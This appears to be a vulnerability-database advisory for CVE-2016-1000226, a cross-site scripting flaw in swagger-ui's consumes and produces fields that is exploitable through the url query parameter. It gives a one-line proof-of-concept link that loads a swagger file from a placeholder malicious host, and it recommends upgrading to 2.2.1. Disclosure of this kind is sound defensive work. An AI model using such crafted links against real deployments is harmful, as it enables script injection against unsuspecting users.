CVE-2016-1000226

Affected versions of swagger-ui are vulnerable to cross-site scripting in both the consumes and produces parameters of the swagger JSON document for a given API.

Additionally, swagger-ui allows users to load arbitrary swagger JSON documents via the query string parameter url, allowing an attacker to exploit this attack against any user that the attacker can convince to visit a crafted link.

Proof of Concept

http://&lt;USER_HOSTNAME&gt;/swagger-ui/index.html?url=http://&lt;MALICIOUS_HOSTNAME&gt;/malicious-swagger-file.json

Recommendation

Update to version 2.2.1 or later.

Published: Sep 1, 2020
Updated: Apr 14, 2023
CVE: CVE-2016-1000226
GHSA: GHSA-7f59-x49p-v8mq
Severity: Critical
Exploit:

No technical information available.

CWEs:

CWE-79

OWASP TOP 10:

A7 - Cross-Site Scripting (XSS)

Affected Software
References

Software	From	Fixed in
swagger-ui	-	2.2.1

https://github.com/swagger-api/swagger-ui/issues/1866
https://github.com/swagger-api/swagger-ui/pull/1867
https://www.npmjs.com/advisories/123

Vulnerability Database

289,599

CVE-2016-1000226

Proof of Concept

Recommendation